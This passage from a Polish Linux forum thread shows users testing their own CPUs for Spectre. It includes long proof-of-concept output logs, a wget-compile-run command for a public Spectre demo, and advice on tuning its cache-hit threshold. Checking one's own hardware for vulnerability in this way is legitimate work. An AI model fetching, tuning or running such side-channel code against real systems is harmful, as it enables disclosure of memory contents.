= 0xffffffffffdfed24... Success: 0x20=’ ’ score=1 Reading at malicious_x = 0xffffffffffdfed25... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed26... Success: 0x05=’?’ score=2 Reading at malicious_x = 0xffffffffffdfed27... Success: 0x05=’?’ score=2 Reading at malicious_x = 0xffffffffffdfed28... Success: 0x05=’?’ score=1 Reading at malicious_x = 0xffffffffffdfed29... Success: 0x05=’?’ score=1 Reading at malicious_x = 0xffffffffffdfed2a... Success: 0x05=’?’ score=1 Reading at malicious_x = 0xffffffffffdfed2b... Success: 0x05=’?’ score=2 Reading at malicious_x = 0xffffffffffdfed2c... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed2d... Success: 0x05=’?’ score=2 Reading at malicious_x = 0xffffffffffdfed2e... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed2f... Success: 0x05=’?’ score=1 Reading at malicious_x = 0xffffffffffdfed30... Success: 0x05=’?’ score=2 Reading at malicious_x = 0xffffffffffdfed31... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed32... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed33... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed34... Success: 0x65=’e’ score=2 (second best: 0x05 score=1) Reading at malicious_x = 0xffffffffffdfed35... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffffffffffdfed36... Success: 0x64=’d’ score=2 Reading at malicious_x = 0xffffffffffdfed37... Success: 0x05=’?’ score=15 (second best: 0x61 score=5) Reading at malicious_x = 0xffffffffffdfed38... Success: 0x05=’?’ score=2 Reading at malicious_x = 0xffffffffffdfed39... Success: 0x61=’a’ score=2 Reading at malicious_x = 0xffffffffffdfed3a... Success: 0x00=’?’ score=1 Reading at malicious_x = 0xffffffffffdfed3b... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed3c... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed3d... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed3e... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed3f... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed40... Success: 0x54=’T’ score=2 Reading at malicious_x = 0xffffffffffdfed41... Success: 0x68=’h’ score=1 Reading at malicious_x = 0xffffffffffdfed42... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed43... Success: 0x05=’?’ score=1 Reading at malicious_x = 0xffffffffffdfed44... Success: 0x20=’ ’ score=1 Reading at malicious_x = 0xffffffffffdfed45... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed46... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed47... Success: 0x20=’ ’ score=6 (second best: 0x05 score=3) Reading at malicious_x = 0xffffffffffdfed48... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed49... Success: 0x05=’?’ score=1 Reading at malicious_x = 0xffffffffffdfed4a... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed4b... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed4c... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed4d... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed4e... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed4f... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed50... Success: 0x05=’?’ score=1 Reading at malicious_x = 0xffffffffffdfed51... Success: 0x72=’r’ score=1 Reading at malicious_x = 0xffffffffffdfed52... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed53... Unclear: 0x73=’s’ score=6 (second best: 0x05 score=4) Reading at malicious_x = 0xffffffffffdfed54... Success: 0x05=’?’ score=2 Reading at malicious_x = 0xffffffffffdfed55... Success: 0x05=’?’ score=2 Reading at malicious_x = 0xffffffffffdfed56... Unclear: 0x05=’?’ score=3 (second best: 0x70 score=2) Reading at malicious_x = 0xffffffffffdfed57... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed58... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed59... Success: 0x20=’ ’ score=1 Reading at malicious_x = 0xffffffffffdfed5a... Success: 0x05=’?’ score=2 (second best: 0x73 score=1) Reading at malicious_x = 0xffffffffffdfed5b... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed5c... Success: 0x05=’?’ score=1 Reading at malicious_x = 0xffffffffffdfed5d... Success: 0x73=’s’ score=1 Reading at malicious_x = 0xffffffffffdfed5e... Success: 0x69=’i’ score=2 Reading at malicious_x = 0xffffffffffdfed5f... Success: 0x74=’t’ score=1 Reading at malicious_x = 0xffffffffffdfed60... Success: 0x69=’i’ score=1 Reading at malicious_x = 0xffffffffffdfed61... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed62... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed63... Unclear: 0x20=’ ’ score=2 (second best: 0x05 score=2) Reading at malicious_x = 0xffffffffffdfed64... Unclear: 0x64=’d’ score=1 (second best: 0x05 score=1) Reading at malicious_x = 0xffffffffffdfed65... Success: 0x05=’?’ score=2 Reading at malicious_x = 0xffffffffffdfed66... Success: 0x05=’?’ score=2 Reading at malicious_x = 0xffffffffffdfed67... Success: 0x05=’?’ score=2 Reading at malicious_x = 0xffffffffffdfed68... Success: 0x05=’?’ score=2 Reading at malicious_x = 0xffffffffffdfed69... Success: 0x05=’?’ score=2 Reading at malicious_x = 0xffffffffffdfed6a... Success: 0x05=’?’ score=2 Reading at malicious_x = 0xffffffffffdfed6b... Success: 0x05=’?’ score=2 Reading at malicious_x = 0xffffffffffdfed6c... Success: 0x05=’?’ score=2 Reading at malicious_x = 0xffffffffffdfed6d... Success: 0x05=’?’ score=2 Reading at malicious_x = 0xffffffffffdfed6e... Unclear: 0x05=’?’ score=1 (second best: 0x00 score=1) Reading at malicious_x = 0xffffffffffdfed6f... Success: 0x52=’R’ score=2 Reading at malicious_x = 0xffffffffffdfed70... Success: 0x05=’?’ score=2 (second best: 0x65 score=1) Reading at malicious_x = 0xffffffffffdfed71... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed72... Unclear: 0x64=’d’ score=1 (second best: 0x05 score=1) Reading at malicious_x = 0xffffffffffdfed73... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed74... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed75... Success: 0x05=’?’ score=1 Reading at malicious_x = 0xffffffffffdfed76... Unclear: 0x20=’ ’ score=1 (second best: 0x05 score=1) Reading at malicious_x = 0xffffffffffdfed77... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed78... Unclear: 0x05=’?’ score=7 (second best: 0x64 score=5) Reading at malicious_x = 0xffffffffffdfed79... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed7a... Success: 0x05=’?’ score=2 Reading at malicious_x = 0xffffffffffdfed7b... Success: 0x05=’?’ score=2 (second best: 0x79 score=1)
I jak takie coś zinterpretować -- w 2/3 bezpieczny czy jak? xD
Wygląda na to, że różne procki są podatne w różnym stopniu.
Ostatnio edytowany przez morfik (2018-01-08 11:27:13)
Offline
@arecki, morfik
Spróbujcie tak:
wget https://gist.githubusercontent.com/Eugnis/3ba3f048988e7be76737ab87da64bb26/raw/dd8881ababaa28bd2373d71c825426b9b7d08340/spectre-thread.c gcc -std=c99 -march=native -pthread -O0 spectre-thread.c -o spectre ./spectre
Jeśli nadal będą problemy z prawidłowym działaniem programu to w pobranym spectre-thread.c edytujcie w linii 29 wartość #define CACHE_HIT_THRESHOLD 80 - trzeba ją zwiększyć, ja testowo zamiast 80 dałam 160. Potem ponowna kompilacja i uruchomienie programu.
Różnica pomiędzy obiema wartościami daje takie rezultaty, istotne to co na dole:
./spectre CACHE_HIT_THRESHOLD = 80 MAX_TRIES = 2500 Size of secret is 41 Size of recovered_secret is 41 Original secret: 'The Magic Words are Squeamish Ossifrage.' Recovered secret: '' Reading 40 bytes: Reading at malicious_x = 0xa0... Unclear: 0xF8=’?’ score=2500 (’?|?’ second: 0xF7=’?’ score=2500) Reading at malicious_x = 0xa1... Unclear: 0xF9=’?’ score=2500 (’?|?’ second: 0xF7=’?’ score=2500) Reading at malicious_x = 0xa2... Unclear: 0xF8=’?’ score=2500 (’?|?’ second: 0xF7=’?’ score=2500) Reading at malicious_x = 0xa3... Unclear: 0xF7=’?’ score=2500 (’?|?’ second: 0xD3=’?’ score=2500) Reading at malicious_x = 0xa4... Unclear: 0xF9=’?’ score=2500 (’?|?’ second: 0xF7=’?’ score=2500) Reading at malicious_x = 0xa5... Unclear: 0xF9=’?’ score=2500 (’?|?’ second: 0xD3=’?’ score=2500) Reading at malicious_x = 0xa6... Unclear: 0xF8=’?’ score=2500 (’?|?’ second: 0xF7=’?’ score=2500) Reading at malicious_x = 0xa7... Unclear: 0xF7=’?’ score=2500 (’?|?’ second: 0xB6=’?’ score=2500) Reading at malicious_x = 0xa8... Unclear: 0xF9=’?’ score=2500 (’?|?’ second: 0xF7=’?’ score=2500) Reading at malicious_x = 0xa9... Unclear: 0xF9=’?’ score=2500 (’?|?’ second: 0xF7=’?’ score=2500) Reading at malicious_x = 0xaa... Unclear: 0xF7=’?’ score=2500 (’?|?’ second: 0xD3=’?’ score=2500) Reading at malicious_x = 0xab... Unclear: 0xF7=’?’ score=2500 (’?|?’ second: 0xD3=’?’ score=2500) Reading at malicious_x = 0xac... Unclear: 0xF9=’?’ score=2500 (’?|?’ second: 0xF7=’?’ score=2500) Reading at malicious_x = 0xad... Unclear: 0xF8=’?’ score=2500 (’?|?’ second: 0xF7=’?’ score=2500) Reading at malicious_x = 0xae... Unclear: 0xF6=’?’ score=2500 (’?|?’ second: 0xA1=’?’ score=2500) Reading at malicious_x = 0xaf... Unclear: 0xD3=’?’ score=2500 (’?|?’ second: 0xBC=’?’ score=2500) Reading at malicious_x = 0xb0... Unclear: 0xF8=’?’ score=2500 (’?|?’ second: 0x9C=’?’ score=2500) Reading at malicious_x = 0xb1... Unclear: 0x72=’r’ score=2500 (’?|r’ first: 0xF7=’?’ score=2500) Reading at malicious_x = 0xb2... Unclear: 0xFA=’?’ score=2500 (’?|?’ second: 0xF9=’?’ score=2500) Reading at malicious_x = 0xb3... Unclear: 0xF9=’?’ score=2500 (’?|?’ second: 0xBC=’?’ score=2500) Reading at malicious_x = 0xb4... Unclear: 0xF9=’?’ score=2500 (’?|?’ second: 0xF7=’?’ score=2500) Reading at malicious_x = 0xb5... Unclear: 0xF9=’?’ score=2500 (’?|?’ second: 0xF6=’?’ score=2500) Reading at malicious_x = 0xb6... Unclear: 0xF8=’?’ score=2500 (’?|?’ second: 0xF7=’?’ score=2500) Reading at malicious_x = 0xb7... Unclear: 0x65=’e’ score=2500 (’e|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xb8... Unclear: 0x61=’a’ score=2500 (’a|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xb9... Unclear: 0x00=’?’ score=2501 (’?|?’ second: 0xF7=’?’ score=2492) Reading at malicious_x = 0xba... Unclear: 0x69=’i’ score=2499 (’?|i’ first: 0x00=’?’ score=2501) Reading at malicious_x = 0xbb... Unclear: 0x73=’s’ score=2500 (’s|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xbc... Unclear: 0x68=’h’ score=2499 (’?|h’ first: 0x00=’?’ score=2501) Reading at malicious_x = 0xbd... Unclear: 0x20=’ ’ score=2500 (’ |?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xbe... Unclear: 0x4F=’O’ score=2500 (’O|?’ second: 0x00=’?’ score=2498) Reading at malicious_x = 0xbf... Unclear: 0x73=’s’ score=2498 (’?|s’ first: 0x00=’?’ score=2501) Reading at malicious_x = 0xc0... Unclear: 0x73=’s’ score=2500 (’s|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xc1... Unclear: 0x69=’i’ score=2500 (’i|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xc2... Unclear: 0x66=’f’ score=2500 (’f|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xc3... Unclear: 0x72=’r’ score=2500 (’r|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xc4... Unclear: 0x61=’a’ score=2500 (’a|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xc5... Unclear: 0x67=’g’ score=2500 (’g|?’ second: 0x00=’?’ score=2499) Reading at malicious_x = 0xc6... Unclear: 0x65=’e’ score=2500 (’e|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xc7... Unclear: 0x2E=’.’ score=2499 (’.|?’ second: 0x00=’?’ score=2498) counter thread finished Original secret: 'The Magic Words are Squeamish Ossifrage.' Recovered secret: '?????????????????r?????ea?ish Ossifrage.'
./spectre CACHE_HIT_THRESHOLD = 160 MAX_TRIES = 2500 Size of secret is 41 Size of recovered_secret is 41 Original secret: 'The Magic Words are Squeamish Ossifrage.' Recovered secret: '' Reading 40 bytes: Reading at malicious_x = 0xa0... Unclear: 0x54=’T’ score=2500 (’?|T’ first: 0xF0=’?’ score=2500) Reading at malicious_x = 0xa1... Unclear: 0x68=’h’ score=2500 (’h|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xa2... Unclear: 0x65=’e’ score=2500 (’e|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xa3... Unclear: 0x20=’ ’ score=2500 (’ |?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xa4... Unclear: 0x4D=’M’ score=2500 (’M|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xa5... Unclear: 0x61=’a’ score=2500 (’?|a’ first: 0xFD=’?’ score=2500) Reading at malicious_x = 0xa6... Unclear: 0x67=’g’ score=2500 (’g|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xa7... Unclear: 0x69=’i’ score=2500 (’i|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xa8... Unclear: 0x63=’c’ score=2500 (’c|?’ second: 0x00=’?’ score=2498) Reading at malicious_x = 0xa9... Unclear: 0x5B=’[’ score=2500 (’?|[’ first: 0xF4=’?’ score=2500) Reading at malicious_x = 0xaa... Unclear: 0x57=’W’ score=2500 (’W|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xab... Unclear: 0x6F=’o’ score=2500 (’o|[’ second: 0x5B=’[’ score=2500) Reading at malicious_x = 0xac... Unclear: 0x72=’r’ score=2500 (’r|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xad... Unclear: 0x64=’d’ score=2500 (’d|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xae... Unclear: 0x73=’s’ score=2500 (’s|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xaf... Unclear: 0x20=’ ’ score=2500 (’ |?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xb0... Unclear: 0x61=’a’ score=2500 (’a|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xb1... Unclear: 0x72=’r’ score=2500 (’r|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xb2... Unclear: 0x65=’e’ score=2500 (’e|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xb3... Unclear: 0x20=’ ’ score=2500 (’ |?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xb4... Unclear: 0x53=’S’ score=2500 (’S|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xb5... Unclear: 0x71=’q’ score=2500 (’q|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xb6... Unclear: 0x75=’u’ score=2500 (’u|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xb7... Unclear: 0x65=’e’ score=2500 (’e|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xb8... Unclear: 0x61=’a’ score=2500 (’a|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xb9... Unclear: 0x6D=’m’ score=2500 (’m|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xba... Unclear: 0x69=’i’ score=2500 (’i|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xbb... Unclear: 0x73=’s’ score=2500 (’s|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xbc... Unclear: 0x68=’h’ score=2500 (’h|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xbd... Unclear: 0x20=’ ’ score=2500 (’ |?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xbe... Unclear: 0x4F=’O’ score=2500 (’O|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xbf... Unclear: 0x73=’s’ score=2500 (’s|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xc0... Unclear: 0x73=’s’ score=2500 (’s|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xc1... Unclear: 0x69=’i’ score=2500 (’i|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xc2... Unclear: 0x66=’f’ score=2500 (’f|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xc3... Unclear: 0x72=’r’ score=2500 (’r|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xc4... Unclear: 0x61=’a’ score=2500 (’a|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xc5... Unclear: 0x67=’g’ score=2500 (’g|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xc6... Unclear: 0x65=’e’ score=2500 (’e|?’ second: 0x00=’?’ score=2501) Reading at malicious_x = 0xc7... Unclear: 0x2E=’.’ score=2500 (’.|?’ second: 0x00=’?’ score=2501) counter thread finished Original secret: 'The Magic Words are Squeamish Ossifrage.' Recovered secret: 'The Magic[Words are Squeamish Ossifrage.'
Offline
Kolejna gałąź oznaczona jako fixed [url]https://security-tracker.debian.org/tracker/CVE-2017-5754[/url]
Offline
U mnie w obu przypadkach wynik jest taki:
Original secret: 'The Magic Words are Squeamish Ossifrage.' Recovered secret: '????????????????????????????????????????'
Czyli chyba mój procek jest jednak na tyle stary Q3 2010, że może nie do końca jest podatny na ten bugi. xD
Offline
[quote=morfik]U mnie w obu przypadkach wynik jest taki:
Original secret: 'The Magic Words are Squeamish Ossifrage.' Recovered secret: '????????????????????????????????????????'
Czyli chyba mój procek jest jednak na tyle stary Q3 2010, że może nie do końca jest podatny na ten bugi. xD[/quote]
Morfik, pochwal sie swoim cudnym magicznym prockiem, bo wedlug mnie sam wiek nie daje gwarancji.
Moj staruszek z 2007: AMD Athlon 64 X2 Dual Core 4200+ @ 2x 2.2GHz
ma ta dziure.
Offline
No to jest ten procek:
https://ark.intel.com/pl/products/50175/Intel-Pentium-Processor-P6100-3M-Cache-2_00-GHz
# cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 37 model name : Intel(R) Pentium(R) CPU P6100 @ 2.00GHz stepping : 5 microcode : 0x4 cpu MHz : 933.000 cache size : 3072 KB physical id : 0 siblings : 2 core id : 0 cpu cores : 2 apicid : 0 initial apicid : 0 fpu : yes fpu_exception : yes cpuid level : 11 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf pni dtes64 monitor ds_cpl est tm2 ssse3 cx16 xtpr pdcm pcid popcnt lahf_lm pti dtherm arat bugs : cpu_insecure bogomips : 4000.02 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical, 48 bits virtual power management: processor : 1 vendor_id : GenuineIntel cpu family : 6 model : 37 model name : Intel(R) Pentium(R) CPU P6100 @ 2.00GHz stepping : 5 microcode : 0x4 cpu MHz : 933.000 cache size : 3072 KB physical id : 0 siblings : 2 core id : 2 cpu cores : 2 apicid : 4 initial apicid : 4 fpu : yes fpu_exception : yes cpuid level : 11 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf pni dtes64 monitor ds_cpl est tm2 ssse3 cx16 xtpr pdcm pcid popcnt lahf_lm pti dtherm arat bugs : cpu_insecure bogomips : 4000.02 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical, 48 bits virtual power management:
Niby podatne mają być procki produkowane od 2010. Ten jest produkowany od Q3 2010, więc niby też powinien.
A i jeszcze taka sprawa. Była aktualizacja:
intel-microcode 3.20171215.1
Ma to znaczenie?
Ostatnio edytowany przez morfik (2018-01-08 16:03:54)
Offline
Time (s) | Query |
---|---|
0.00013 | SET CHARSET latin2 |
0.00005 | SET NAMES latin2 |
0.00138 | SELECT u.*, g.*, o.logged FROM punbb_users AS u INNER JOIN punbb_groups AS g ON u.group_id=g.g_id LEFT JOIN punbb_online AS o ON o.ident='3.129.195.254' WHERE u.id=1 |
0.00085 | REPLACE INTO punbb_online (user_id, ident, logged) VALUES(1, '3.129.195.254', 1732763833) |
0.00045 | SELECT * FROM punbb_online WHERE logged<1732763533 |
0.00092 | SELECT topic_id FROM punbb_posts WHERE id=316666 |
0.00016 | SELECT id FROM punbb_posts WHERE topic_id=30168 ORDER BY posted |
0.00054 | SELECT t.subject, t.closed, t.num_replies, t.sticky, f.id AS forum_id, f.forum_name, f.moderators, fp.post_replies, 0 FROM punbb_topics AS t INNER JOIN punbb_forums AS f ON f.id=t.forum_id LEFT JOIN punbb_forum_perms AS fp ON (fp.forum_id=f.id AND fp.group_id=3) WHERE (fp.read_forum IS NULL OR fp.read_forum=1) AND t.id=30168 AND t.moved_to IS NULL |
0.00005 | SELECT search_for, replace_with FROM punbb_censoring |
0.00370 | SELECT u.email, u.title, u.url, u.location, u.use_avatar, u.signature, u.email_setting, u.num_posts, u.registered, u.admin_note, p.id, p.poster AS username, p.poster_id, p.poster_ip, p.poster_email, p.message, p.hide_smilies, p.posted, p.edited, p.edited_by, g.g_id, g.g_user_title, o.user_id AS is_online FROM punbb_posts AS p INNER JOIN punbb_users AS u ON u.id=p.poster_id INNER JOIN punbb_groups AS g ON g.g_id=u.group_id LEFT JOIN punbb_online AS o ON (o.user_id=u.id AND o.user_id!=1 AND o.idle=0) WHERE p.topic_id=30168 ORDER BY p.id LIMIT 50,25 |
0.00089 | UPDATE punbb_topics SET num_views=num_views+1 WHERE id=30168 |
Total query time: 0.00912 s |